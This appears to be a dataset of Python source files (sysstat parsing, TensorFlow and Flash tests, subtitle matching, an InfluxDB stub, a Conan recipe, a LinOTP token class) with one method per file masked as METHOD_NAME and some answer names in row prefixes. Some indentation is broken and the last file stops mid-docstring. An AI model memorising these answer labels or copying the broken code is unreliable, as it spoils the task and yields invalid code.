def stats_swap(file, collect_date=None):
    """Swap activity samples for the last two days (no-op on this platform)."""
    return twodays(stats_swap_day)
def stats_swap_day(t):
    """Per-day swap stats: not implemented for SunOS, always empty."""
    return []
def stats_block(file, collect_date=None):
    """Aggregate block-I/O samples covering the last two days."""
    return twodays(stats_block_day)
def stats_block_day(t):
    """Parse aggregate block-I/O activity from the sysstat archive for day *t*.

    Returns rows in the collector's xmlrpc layout:
    [date, tps, rtps, wtps, rbps, wbps, nodename]
    """
    d = t.strftime("%Y-%m-%d")
    day = t.strftime("%d")
    f = sarfile(day)
    if f is None:
        return []
    cmd = ['sar', '-b', '-f', f]
    (ret, buff, err) = call(cmd)
    lines = []
    for line in buff.split('\n'):
        l = line.split()
        if len(l) != 9:
            continue
        # BUG FIX: data rows carry the HH:MM:SS timestamp in the FIRST field.
        # The previous test (':' not in l[1]) rejected every data row, since
        # the second field is numeric, so this function always returned [].
        if ':' not in l[0]:
            continue
        # Skip the column-title row, which also starts with a timestamp.
        if l[1] == 'bread/s':
            continue
        """ xmlrpc: date tps rtps wtps rbps wbps nodename
        """
        x = ['%s %s' % (d, l[0]), '0', '0', '0', l[1], l[4], Env.nodename]
        lines.append(x)
    return lines
def METHOD_NAME(file, collect_date=None):
    """Per-device block-I/O samples covering the last two days."""
    return twodays(stats_blockdev_day)
def stats_blockdev_day(t):
    """Parse per-device activity from the sysstat archive for day *t*."""
    d = t.strftime("%Y-%m-%d")
    day = t.strftime("%d")
    f = sarfile(day)
    if f is None:
        return []
    cmd = ['sar', '-d', '-f', f]
    (ret, buff, err) = call(cmd, errlog=False)
    lines = []
    last_date = '00:00:00'
    for line in buff.split('\n'):
        l = line.split()
        # 8-field rows start a new timestamp; 7-field rows are continuation
        # lines for additional devices under the previous timestamp, so the
        # remembered timestamp is prepended to normalize them.
        if len(l) == 8:
            last_date = l[0]
        if len(l) == 7:
            l = [last_date] + l
        if len(l) != 8:
            continue
        if l[1] == 'device':
            continue
        if l[0] == 'Average':
            continue
        """ xmlrpc: 22:05:01 DEV tps rd_sec/s wr_sec/s avgrq-sz avgqu-sz await svctm %util
            00:00:00 device %busy avque r+w/s blks/s avwait avserv
        """
        x = ['%s %s' % (d, l[0]), l[1], l[4], '0', '0', '0', l[3], l[6], l[7], l[2], Env.nodename]
        lines.append(x)
    return lines
def stats_netdev(file, collect_date=None):
    """Network device samples for the last two days (no-op on this platform)."""
    return twodays(stats_netdev_day)
def stats_netdev_day(t):
    """Per-day network stats: not implemented for SunOS, always empty."""
    return []
def stats_netdev_err(file, collect_date=None):
    """Network error samples for the last two days (no-op on this platform)."""
    return twodays(stats_netdev_err_day)
def stats_netdev_err_day(t):
    """Per-day network error stats: not implemented for SunOS, always empty."""
    return []
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests `FeedingQueueRunner` using arrays and `DataFrames`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.estimator.inputs.queues.feeding_functions import _enqueue_data as enqueue_data
from tensorflow.python.framework import ops
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner_impl
# pylint: disable=g-import-not-at-top
try:
import pandas as pd
HAS_PANDAS = True
except ImportError:
HAS_PANDAS = False
def get_rows(array, row_indices):
  """Stack the rows of *array* selected by *row_indices* into a new array."""
  return np.vstack([array[i] for i in row_indices])
class FeedingQueueRunnerTestCase(test.TestCase):
  """Tests for `FeedingQueueRunner`."""

  def testArrayFeeding(self):
    # Single-threaded feeding from a numpy array: batches must come back in
    # order, wrapping modulo the number of rows.
    with ops.Graph().as_default():
      array = np.arange(32).reshape([16, 2])
      q = enqueue_data(array, capacity=100)
      batch_size = 3
      dq_op = q.dequeue_many(batch_size)
      with session.Session() as sess:
        coord = coordinator.Coordinator()
        threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
        for i in range(100):
          # Expected row indices for the i-th batch (wraps around the array).
          indices = [
              j % array.shape[0]
              for j in range(batch_size * i, batch_size * (i + 1))
          ]
          expected_dq = get_rows(array, indices)
          dq = sess.run(dq_op)
          np.testing.assert_array_equal(indices, dq[0])
          np.testing.assert_array_equal(expected_dq, dq[1])
        coord.request_stop()
        coord.join(threads)

  def testArrayFeedingMultiThread(self):
    # Multi-threaded, shuffled feeding: ordering is not deterministic, so only
    # check that each dequeued row matches the row at its reported index.
    with ops.Graph().as_default():
      array = np.arange(256).reshape([128, 2])
      q = enqueue_data(array, capacity=128, num_threads=8, shuffle=True)
      batch_size = 3
      dq_op = q.dequeue_many(batch_size)
      with session.Session() as sess:
        coord = coordinator.Coordinator()
        threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
        for _ in range(100):
          dq = sess.run(dq_op)
          indices = dq[0]
          expected_dq = get_rows(array, indices)
          np.testing.assert_array_equal(expected_dq, dq[1])
        coord.request_stop()
        coord.join(threads)

  def testPandasFeeding(self):
    # DataFrame feeding: the first dequeued tensor carries the frame's index,
    # the remaining tensors carry one column each.
    if not HAS_PANDAS:
      return
    with ops.Graph().as_default():
      array1 = np.arange(32)
      array2 = np.arange(32, 64)
      df = pd.DataFrame({"a": array1, "b": array2}, index=np.arange(64, 96))
      q = enqueue_data(df, capacity=100)
      batch_size = 5
      dq_op = q.dequeue_many(5)
      with session.Session() as sess:
        coord = coordinator.Coordinator()
        threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
        for i in range(100):
          indices = [
              j % array1.shape[0]
              for j in range(batch_size * i, batch_size * (i + 1))
          ]
          expected_df_indices = df.index[indices]
          expected_rows = df.iloc[indices]
          dq = sess.run(dq_op)
          np.testing.assert_array_equal(expected_df_indices, dq[0])
          for col_num, col in enumerate(df.columns):
            np.testing.assert_array_equal(expected_rows[col].values,
                                          dq[col_num + 1])
        coord.request_stop()
        coord.join(threads)

  def METHOD_NAME(self):
    # Multi-threaded, shuffled DataFrame feeding: check each dequeued row
    # against the frame row addressed by the dequeued index.
    if not HAS_PANDAS:
      return
    with ops.Graph().as_default():
      array1 = np.arange(128, 256)
      array2 = 2 * array1
      df = pd.DataFrame({"a": array1, "b": array2}, index=np.arange(128))
      q = enqueue_data(df, capacity=128, num_threads=8, shuffle=True)
      batch_size = 5
      dq_op = q.dequeue_many(batch_size)
      with session.Session() as sess:
        coord = coordinator.Coordinator()
        threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
        for _ in range(100):
          dq = sess.run(dq_op)
          indices = dq[0]
          expected_rows = df.iloc[indices]
          for col_num, col in enumerate(df.columns):
            np.testing.assert_array_equal(expected_rows[col].values,
                                          dq[col_num + 1])
        coord.request_stop()
        coord.join(threads)
# Run the TensorFlow test runner when executed as a script.
if __name__ == "__main__":
  test.main()
# -*- coding: utf-8 -*-
from rebulk.loose import ensure_list
from .score import get_equivalent_release_groups, score_keys
from .video import Episode, Movie
from .utils import sanitize, sanitize_release_group
def series_matches(video, title=None, **kwargs):
    """Whether the `video` matches the series title.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param str title: the series name.
    :return: whether there's a match
    :rtype: bool
    """
    if not isinstance(video, Episode):
        return None
    if not video.series:
        # Preserve the original falsy return value (e.g. None or '').
        return video.series
    wanted = sanitize(title)
    candidates = [video.series] + video.alternative_series
    return wanted in (sanitize(name) for name in candidates)
def title_matches(video, title=None, episode_title=None, **kwargs):
    """Whether the movie matches the movie `title` or the series matches the `episode_title`.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param str title: the movie title.
    :param str episode_title: the series episode title.
    :return: whether there's a match
    :rtype: bool
    """
    if isinstance(video, Episode):
        return video.title and sanitize(video.title) == sanitize(episode_title)
    if isinstance(video, Movie):
        return video.title and sanitize(video.title) == sanitize(title)
def season_matches(video, season=None, **kwargs):
    """Whether the episode matches the `season`.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param int season: the episode season.
    :return: whether there's a match
    :rtype: bool
    """
    if not isinstance(video, Episode):
        return None
    return video.season and video.season == season
def episode_matches(video, episode=None, **kwargs):
    """Whether the episode matches the `episode`.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param episode: the episode season.
    :type: list of int or int
    :return: whether there's a match
    :rtype: bool
    """
    if not isinstance(video, Episode):
        return None
    return video.episodes and video.episodes == ensure_list(episode)
def year_matches(video, year=None, partial=False, **kwargs):
    """Whether the video matches the `year`.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param int year: the video year.
    :param bool partial: whether or not the guess is partial.
    :return: whether there's a match
    :rtype: bool
    """
    if video.year and video.year == year:
        return True
    if isinstance(video, Episode):
        # For a full guess of an original series, the absence of a year is
        # itself treated as agreement.
        return not partial and video.original_series and not year
def country_matches(video, country=None, partial=False, **kwargs):
    """Whether the video matches the `country`.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param country: the video country.
    :type country: :class:`~babelfish.country.Country`
    :param bool partial: whether or not the guess is partial.
    :return: whether there's a match
    :rtype: bool
    """
    if video.country and video.country == country:
        return True
    if isinstance(video, Episode):
        # For a full guess of an original series, "no country" on both sides
        # counts as agreement.
        return not partial and video.original_series and not country
    if isinstance(video, Movie):
        # For movies, "no country" on both sides counts as agreement.
        return not video.country and not country
def release_group_matches(video, release_group=None, **kwargs):
    """Whether the video matches the `release_group`.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param str release_group: the video release group.
    :return: whether there's a match
    :rtype: bool
    """
    if not (video.release_group and release_group):
        # Preserve the original short-circuit value of the `and` chain.
        return video.release_group and release_group
    guessed = sanitize_release_group(release_group)
    equivalents = get_equivalent_release_groups(sanitize_release_group(video.release_group))
    return any(candidate in guessed for candidate in equivalents)
def METHOD_NAME(video, streaming_service=None, **kwargs):
    """Whether the video matches the `streaming_service`.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param str streaming_service: the video streaming service
    :return: whether there's a match
    :rtype: bool
    """
    actual = video.streaming_service
    return actual and actual == streaming_service
def resolution_matches(video, screen_size=None, **kwargs):
    """Whether the video matches the `resolution`.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param str screen_size: the video resolution
    :return: whether there's a match
    :rtype: bool
    """
    actual = video.resolution
    return actual and actual == screen_size
def source_matches(video, source=None, **kwargs):
    """Whether the video matches the `source`.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param str source: the video source
    :return: whether there's a match
    :rtype: bool
    """
    actual = video.source
    return actual and actual == source
def video_codec_matches(video, video_codec=None, **kwargs):
    """Whether the video matches the `video_codec`.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param str video_codec: the video codec
    :return: whether there's a match
    :rtype: bool
    """
    actual = video.video_codec
    return actual and actual == video_codec
def audio_codec_matches(video, audio_codec=None, **kwargs):
    """Whether the video matches the `audio_codec`.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param str audio_codec: the video audio codec
    :return: whether there's a match
    :rtype: bool
    """
    actual = video.audio_codec
    return actual and actual == audio_codec
#: Available matches functions
# Maps each scoring key to the predicate deciding whether the guessed
# attribute agrees with the video; consumed by guess_matches() below.
matches_manager = {
    'series': series_matches,
    'title': title_matches,
    'season': season_matches,
    'episode': episode_matches,
    'year': year_matches,
    'country': country_matches,
    'release_group': release_group_matches,
    'streaming_service': METHOD_NAME,
    'resolution': resolution_matches,
    'source': source_matches,
    'video_codec': video_codec_matches,
    'audio_codec': audio_codec_matches
}
def guess_matches(video, guess, partial=False):
    """Get matches between a `video` and a `guess`.

    If a guess is `partial`, the absence information won't be counted as a match.

    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param guess: the guess.
    :type guess: dict
    :param bool partial: whether or not the guess is partial.
    :return: matches between the `video` and the `guess`.
    :rtype: set
    """
    return {
        key
        for key in score_keys
        if key in matches_manager and matches_manager[key](video, partial=partial, **guess)
    }
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import json
import os
from typing import Any
import numpy as np
import pytest
import torch
from flash import Trainer
from flash.core.data.io.input import DataKeys
from flash.core.utilities.imports import _ICEDATA_AVAILABLE, _ICEVISION_AVAILABLE, _TOPIC_IMAGE_AVAILABLE
from flash.image import KeypointDetectionData, KeypointDetector
from tests.helpers.task_tester import TaskTester
if _TOPIC_IMAGE_AVAILABLE:
from PIL import Image
# Lightweight container for the COCO fixture paths used by the tests below.
COCODataConfig = collections.namedtuple("COCODataConfig", "train_folder train_ann_file predict_folder")
@pytest.fixture()
def coco_keypoints(tmpdir):
    """Build a tiny synthetic COCO keypoint dataset on disk.

    Creates three random 64x64 training images, three prediction images and a
    COCO-format annotation file with two categories ("cat", "dog"), each with
    two keypoints per instance. Returns the paths bundled in a COCODataConfig.
    """
    rand_image = Image.fromarray(np.random.randint(0, 255, (64, 64, 3), dtype="uint8"))
    os.makedirs(tmpdir / "train_folder", exist_ok=True)
    os.makedirs(tmpdir / "predict_folder", exist_ok=True)
    train_folder = tmpdir / "train_folder"
    train_ann_file = tmpdir / "train_annotations.json"
    predict_folder = tmpdir / "predict_folder"
    _ = [rand_image.save(str(train_folder / f"image_{i}.png")) for i in range(1, 4)]
    _ = [rand_image.save(str(predict_folder / f"predict_image_{i}.png")) for i in range(1, 4)]
    # COCO keypoints are flat [x, y, visibility] triplets per instance.
    annotations = {
        "annotations": [
            {
                "area": 50,
                "bbox": [10, 20, 5, 10],
                "num_keypoints": 2,
                "keypoints": [10, 15, 2, 20, 30, 2],
                "category_id": 1,
                "id": 1,
                "image_id": 1,
                "iscrowd": 0,
            },
            {
                "area": 100,
                "bbox": [20, 30, 10, 10],
                "num_keypoints": 2,
                "keypoints": [20, 30, 2, 30, 40, 2],
                "category_id": 2,
                "id": 2,
                "image_id": 2,
                "iscrowd": 0,
            },
            {
                "area": 125,
                "bbox": [10, 20, 5, 25],
                "num_keypoints": 2,
                "keypoints": [10, 15, 2, 20, 45, 2],
                "category_id": 1,
                "id": 3,
                "image_id": 3,
                "iscrowd": 0,
            },
        ],
        "categories": [
            {"id": 1, "name": "cat", "supercategory": "cat", "keypoints": ["left ear", "right ear"]},
            {"id": 2, "name": "dog", "supercategory": "dog", "keypoints": ["left ear", "right ear"]},
        ],
        "images": [
            {"file_name": "image_1.png", "height": 64, "width": 64, "id": 1},
            {"file_name": "image_2.png", "height": 64, "width": 64, "id": 2},
            {"file_name": "image_3.png", "height": 64, "width": 64, "id": 3},
        ],
    }
    with open(train_ann_file, "w") as annotation_file:
        json.dump(annotations, annotation_file)
    return COCODataConfig(train_folder, train_ann_file, predict_folder)
@pytest.mark.skipif(not _ICEDATA_AVAILABLE, reason="icedata is not installed for testing")
@pytest.mark.skipif(not _ICEVISION_AVAILABLE, reason="icevision is not installed for testing")
class TestKeypointDetector(TaskTester):
    """Generic TaskTester harness configuration for KeypointDetector."""

    task = KeypointDetector
    # Positional args for the task constructor: number of keypoints.
    task_args = (2,)
    task_kwargs = {"num_classes": 2}
    cli_command = "keypoint_detection"
    is_testing = _TOPIC_IMAGE_AVAILABLE
    is_available = _TOPIC_IMAGE_AVAILABLE and _ICEVISION_AVAILABLE

    # TODO: Resolve JIT support
    traceable = False
    scriptable = False

    @property
    def example_forward_input(self):
        # Single RGB image batch for the forward-pass smoke test.
        return torch.rand(1, 3, 32, 32)

    def METHOD_NAME(self, output: Any):
        # Forward output is a per-image list of prediction dicts; each must
        # expose at least keypoints, labels and scores.
        assert {"keypoints", "labels", "scores"} <= output[0].keys()

    @property
    def example_train_sample(self):
        # One annotated sample in the task's input format: an image tensor
        # plus per-instance bboxes, labels and keypoint lists.
        return {
            DataKeys.INPUT: torch.rand(3, 224, 224),
            DataKeys.TARGET: {
                "bboxes": [
                    {"xmin": 10, "ymin": 10, "width": 20, "height": 20},
                    {"xmin": 30, "ymin": 30, "width": 40, "height": 40},
                ],
                "labels": [0, 1],
                "keypoints": [
                    [{"x": 10, "y": 10, "visible": 1}],
                    [{"x": 10, "y": 10, "visible": 1}],
                ],
            },
        }

    @property
    def example_val_sample(self):
        return self.example_train_sample

    @property
    def example_test_sample(self):
        return self.example_train_sample
@pytest.mark.skipif(not _TOPIC_IMAGE_AVAILABLE, reason="image libraries aren't installed.")
@pytest.mark.parametrize(("backbone", "head"), [("resnet18_fpn", "keypoint_rcnn")])
def test_model(coco_keypoints, backbone, head):
    """Smoke-test fit + predict on the tiny synthetic COCO keypoint dataset."""
    datamodule = KeypointDetectionData.from_coco(
        train_folder=coco_keypoints.train_folder,
        train_ann_file=coco_keypoints.train_ann_file,
        predict_folder=coco_keypoints.predict_folder,
        transform_kwargs={"image_size": (128, 128)},
        batch_size=2,
    )

    # Two annotated categories plus the implicit background class.
    assert datamodule.num_classes == 3
    assert datamodule.labels == ["background", "cat", "dog"]

    model = KeypointDetector(2, num_classes=datamodule.num_classes, backbone=backbone, head=head)
    trainer = Trainer(fast_dev_run=True)  # runs a single batch only
    trainer.fit(model, datamodule=datamodule)
    trainer.predict(model, datamodule=datamodule)
298,422 | get dashboards id | from _typeshed import Incomplete
from influxdb_client.service._base_service import _BaseService
class DashboardsService(_BaseService):
    """Type stub for the InfluxDB dashboards API client.

    Each operation comes in three flavors: the plain synchronous call, a
    ``*_with_http_info`` variant (returns response metadata as well), and an
    ``*_async`` coroutine variant.
    """

    def __init__(self, api_client: Incomplete | None = None) -> None: ...
    def delete_dashboards_id(self, dashboard_id, **kwargs): ...
    def delete_dashboards_id_with_http_info(self, dashboard_id, **kwargs): ...
    async def delete_dashboards_id_async(self, dashboard_id, **kwargs): ...
    def delete_dashboards_id_cells_id(self, dashboard_id, cell_id, **kwargs): ...
    def delete_dashboards_id_cells_id_with_http_info(self, dashboard_id, cell_id, **kwargs): ...
    async def delete_dashboards_id_cells_id_async(self, dashboard_id, cell_id, **kwargs): ...
    def delete_dashboards_id_labels_id(self, dashboard_id, label_id, **kwargs): ...
    def delete_dashboards_id_labels_id_with_http_info(self, dashboard_id, label_id, **kwargs): ...
    async def delete_dashboards_id_labels_id_async(self, dashboard_id, label_id, **kwargs): ...
    def delete_dashboards_id_members_id(self, user_id, dashboard_id, **kwargs): ...
    def delete_dashboards_id_members_id_with_http_info(self, user_id, dashboard_id, **kwargs): ...
    async def delete_dashboards_id_members_id_async(self, user_id, dashboard_id, **kwargs): ...
    def delete_dashboards_id_owners_id(self, user_id, dashboard_id, **kwargs): ...
    def delete_dashboards_id_owners_id_with_http_info(self, user_id, dashboard_id, **kwargs): ...
    async def delete_dashboards_id_owners_id_async(self, user_id, dashboard_id, **kwargs): ...
    def get_dashboards(self, **kwargs): ...
    def get_dashboards_with_http_info(self, **kwargs): ...
    async def get_dashboards_async(self, **kwargs): ...
    def METHOD_NAME(self, dashboard_id, **kwargs): ...
    def get_dashboards_id_with_http_info(self, dashboard_id, **kwargs): ...
    async def get_dashboards_id_async(self, dashboard_id, **kwargs): ...
    def get_dashboards_id_cells_id_view(self, dashboard_id, cell_id, **kwargs): ...
    def get_dashboards_id_cells_id_view_with_http_info(self, dashboard_id, cell_id, **kwargs): ...
    async def get_dashboards_id_cells_id_view_async(self, dashboard_id, cell_id, **kwargs): ...
    def get_dashboards_id_labels(self, dashboard_id, **kwargs): ...
    def get_dashboards_id_labels_with_http_info(self, dashboard_id, **kwargs): ...
    async def get_dashboards_id_labels_async(self, dashboard_id, **kwargs): ...
    def get_dashboards_id_members(self, dashboard_id, **kwargs): ...
    def get_dashboards_id_members_with_http_info(self, dashboard_id, **kwargs): ...
    async def get_dashboards_id_members_async(self, dashboard_id, **kwargs): ...
    def get_dashboards_id_owners(self, dashboard_id, **kwargs): ...
    def get_dashboards_id_owners_with_http_info(self, dashboard_id, **kwargs): ...
    async def get_dashboards_id_owners_async(self, dashboard_id, **kwargs): ...
    def patch_dashboards_id(self, dashboard_id, **kwargs): ...
    def patch_dashboards_id_with_http_info(self, dashboard_id, **kwargs): ...
    async def patch_dashboards_id_async(self, dashboard_id, **kwargs): ...
    def patch_dashboards_id_cells_id(self, dashboard_id, cell_id, cell_update, **kwargs): ...
    def patch_dashboards_id_cells_id_with_http_info(self, dashboard_id, cell_id, cell_update, **kwargs): ...
    async def patch_dashboards_id_cells_id_async(self, dashboard_id, cell_id, cell_update, **kwargs): ...
    def patch_dashboards_id_cells_id_view(self, dashboard_id, cell_id, view, **kwargs): ...
    def patch_dashboards_id_cells_id_view_with_http_info(self, dashboard_id, cell_id, view, **kwargs): ...
    async def patch_dashboards_id_cells_id_view_async(self, dashboard_id, cell_id, view, **kwargs): ...
    def post_dashboards(self, create_dashboard_request, **kwargs): ...
    def post_dashboards_with_http_info(self, create_dashboard_request, **kwargs): ...
    async def post_dashboards_async(self, create_dashboard_request, **kwargs): ...
    def post_dashboards_id_cells(self, dashboard_id, create_cell, **kwargs): ...
    def post_dashboards_id_cells_with_http_info(self, dashboard_id, create_cell, **kwargs): ...
    async def post_dashboards_id_cells_async(self, dashboard_id, create_cell, **kwargs): ...
    def post_dashboards_id_labels(self, dashboard_id, label_mapping, **kwargs): ...
    def post_dashboards_id_labels_with_http_info(self, dashboard_id, label_mapping, **kwargs): ...
    async def post_dashboards_id_labels_async(self, dashboard_id, label_mapping, **kwargs): ...
    def post_dashboards_id_members(self, dashboard_id, add_resource_member_request_body, **kwargs): ...
    def post_dashboards_id_members_with_http_info(self, dashboard_id, add_resource_member_request_body, **kwargs): ...
    async def post_dashboards_id_members_async(self, dashboard_id, add_resource_member_request_body, **kwargs): ...
    def post_dashboards_id_owners(self, dashboard_id, add_resource_member_request_body, **kwargs): ...
    def post_dashboards_id_owners_with_http_info(self, dashboard_id, add_resource_member_request_body, **kwargs): ...
    async def post_dashboards_id_owners_async(self, dashboard_id, add_resource_member_request_body, **kwargs): ...
    def put_dashboards_id_cells(self, dashboard_id, cell, **kwargs): ...
    def put_dashboards_id_cells_with_http_info(self, dashboard_id, cell, **kwargs): ...
    async def put_dashboards_id_cells_async(self, dashboard_id, cell, **kwargs): ...
298,423 | source | from conan import ConanFile
from conan.tools.cmake import CMake, CMakeToolchain,CMakeDeps, cmake_layout
from conan.tools.files import copy, get
from conan.tools.build import check_min_cppstd
from conan.errors import ConanInvalidConfiguration
from conan.tools.scm import Version
import os
required_conan_version = ">=1.53.0"
class ClickHouseCppConan(ConanFile):
    """Conan recipe packaging clickhouse-cpp, the ClickHouse C++ client library."""

    name = "clickhouse-cpp"
    description = "ClickHouse C++ API"
    license = "Apache-2.0"
    url = "https://github.com/conan-io/conan-center-index"
    homepage = "https://github.com/ClickHouse/clickhouse-cpp"
    topics = ("database", "db", "clickhouse")
    package_type = "library"
    settings = "os", "arch", "compiler", "build_type"
    options = {
        "shared": [True, False],
        "fPIC": [True, False],
        "with_openssl": [True, False],
    }
    default_options = {
        "shared": False,
        "fPIC": True,
        "with_openssl": False,
    }

    @property
    def _min_cppstd(self):
        # Upstream requires C++17.
        return "17"

    @property
    def _compilers_minimum_version(self):
        # Oldest compiler versions accepted for the required C++17 support.
        return {
            "Visual Studio": "15",
            "msvc": "191",
            "gcc": "7",
            "clang": "6",
        }

    @property
    def _requires_compiler_rt(self):
        # clang needs the compiler-rt runtime when statically linking against
        # libstdc++, or whenever libc++ is the standard library.
        return self.settings.compiler == "clang" and \
            ((self.settings.compiler.libcxx in ["libstdc++", "libstdc++11"] and not self.options.shared) or \
             self.settings.compiler.libcxx == "libc++")

    def config_options(self):
        # fPIC is meaningless on Windows.
        if self.settings.os == "Windows":
            del self.options.fPIC

    def configure(self):
        # Shared builds are always position independent; drop the option.
        if self.options.shared:
            self.options.rm_safe("fPIC")

    def layout(self):
        cmake_layout(self, src_folder="src")

    def requirements(self):
        self.requires("lz4/1.9.4")
        # abseil types appear in the public headers, hence transitive_headers.
        self.requires("abseil/20230125.3", transitive_headers=True)
        self.requires("cityhash/cci.20130801")
        if self.options.with_openssl:
            self.requires("openssl/[>=1.1 <4]")

    def validate(self):
        if self.settings.compiler.get_safe("cppstd"):
            check_min_cppstd(self, self._min_cppstd)
        minimum_version = self._compilers_minimum_version.get(str(self.settings.compiler), False)
        if minimum_version and Version(self.settings.compiler.version) < minimum_version:
            raise ConanInvalidConfiguration(f"{self.ref} requires C++{self._min_cppstd}, which your compiler does not support.")
        if self.settings.os == "Windows" and self.options.shared:
            raise ConanInvalidConfiguration(f"{self.ref} does not support shared library on Windows.")
            # look at https://github.com/ClickHouse/clickhouse-cpp/pull/226

    def METHOD_NAME(self):
        # Fetch and unpack the upstream sources declared in conandata.yml.
        get(self, **self.conan_data["sources"][self.version], strip_root=True)

    def generate(self):
        tc = CMakeToolchain(self)
        tc.cache_variables["BUILD_SHARED_LIBS"] = self.options.shared
        tc.cache_variables["WITH_OPENSSL"] = self.options.with_openssl
        # Always build against the conan-provided dependencies, never vendored copies.
        tc.cache_variables["WITH_SYSTEM_ABSEIL"] = True
        tc.cache_variables["WITH_SYSTEM_LZ4"] = True
        tc.cache_variables["WITH_SYSTEM_CITYHASH"] = True
        tc.generate()
        cd = CMakeDeps(self)
        cd.generate()

    def build(self):
        cmake = CMake(self)
        cmake.configure()
        cmake.build()

    def package(self):
        copy(self, "LICENSE", src=self.source_folder, dst=os.path.join(self.package_folder, "licenses"))
        cmake = CMake(self)
        cmake.install()

    def package_info(self):
        self.cpp_info.libs.append("clickhouse-cpp-lib")
        self.cpp_info.set_property("cmake_target_name", "clickhouse-cpp-lib::clickhouse-cpp-lib")

        if self._requires_compiler_rt:
            ldflags = ["--rtlib=compiler-rt"]
            self.cpp_info.exelinkflags = ldflags
            self.cpp_info.sharedlinkflags = ldflags
            self.cpp_info.system_libs.append("gcc_s")

        if self.settings.os == 'Windows':
            self.cpp_info.system_libs = ['ws2_32', 'wsock32']

        # TODO: to remove in conan v2 once cmake_find_package_* generators removed
        self.cpp_info.filenames["cmake_find_package"] = "clickhouse-cpp"
        self.cpp_info.filenames["cmake_find_package_multi"] = "clickhouse-cpp"
        self.cpp_info.names["cmake_find_package"] = "clickhouse-cpp-lib"
        self.cpp_info.names["cmake_find_package_multi"] = "clickhouse-cpp-lib"
298,424 | get class type | # -*- coding: utf-8 -*-
#
# LinOTP - the open source solution for two factor authentication
# Copyright (C) 2010-2019 KeyIdentity GmbH
# Copyright (C) 2019- netgo software GmbH
#
# This file is part of LinOTP server.
#
# This program is free software: you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public
# License, version 3, as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the
# GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# E-mail: info@linotp.de
# Contact: www.linotp.org
# Support: www.linotp.de
#
""" This file containes PasswordTokenClass """
import logging
from linotp.lib.crypto import utils
from linotp.lib.error import ParameterError
from linotp.tokens import tokenclass_registry
from linotp.tokens.base import TokenClass
from linotp.tokens.hmactoken import HmacTokenClass
log = logging.getLogger(__name__)
###############################################
@tokenclass_registry.class_entry("pw")
@tokenclass_registry.class_entry(
    "linotp.tokens.passwordtoken.PasswordTokenClass"
)
class PasswordTokenClass(HmacTokenClass):
    """
    This Token does use a static Password as the OTP value.
    In addition, the OTP PIN can be used with this token.
    This Token can be used for a scenario like losttoken
    """

    def __init__(self, aToken):
        # Deliberately initialise via TokenClass (not HmacTokenClass):
        # hmac seed handling does not apply to a static password.
        TokenClass.__init__(self, aToken)
        self.hKeyRequired = True
        self.setType("pw")

    @classmethod
    def METHOD_NAME(cls):
        """Return the token type identifier used in the token database."""
        return "pw"

    @classmethod
    def getClassPrefix(cls):
        """Return the serial number prefix for tokens of this class."""
        return "kipw"

    @classmethod
    def getClassInfo(cls, key=None, ret="all"):
        """
        getClassInfo - returns a subtree of the token definition

        :param key: subsection identifier
        :type key: string

        :param ret: default return value, if nothing is found
        :type ret: user defined

        :return: subsection if key exists or user defined
        :rtype: s.o.
        """
        res = {
            "type": "pw",
            "title": "Password Token",
            "description": (
                "A token with a fixed password. Can be combined "
                "with the OTP PIN. Is used for the lost token "
                "scenario."
            ),
            "init": {
                "page": {
                    "html": "passwordtoken.mako",
                    "scope": "enroll",
                },
                "title": {
                    "html": "passwordtoken.mako",
                    "scope": "enroll.title",
                },
            },
            "config": {
                "page": {
                    "html": "passwordtoken.mako",
                    "scope": "config",
                },
                "title": {
                    "html": "passwordtoken.mako",
                    "scope": "config.title",
                },
            },
            "selfservice": {
                "enroll": {
                    "page": {
                        "html": "passwordtoken.mako",
                        "scope": "selfservice.enroll",
                    },
                    "title": {
                        "html": "passwordtoken.mako",
                        "scope": "selfservice.title.enroll",
                    },
                },
            },
            "policy": {},
        }

        if key and key in res:
            ret = res.get(key)
        else:
            if ret == "all":
                ret = res
        return ret

    def update(self, param):
        """
        update - the api, which is called during the token enrollment

        we have to make sure that the otpkey, which carries our password
        is encoded as utf-8 to not break the storing

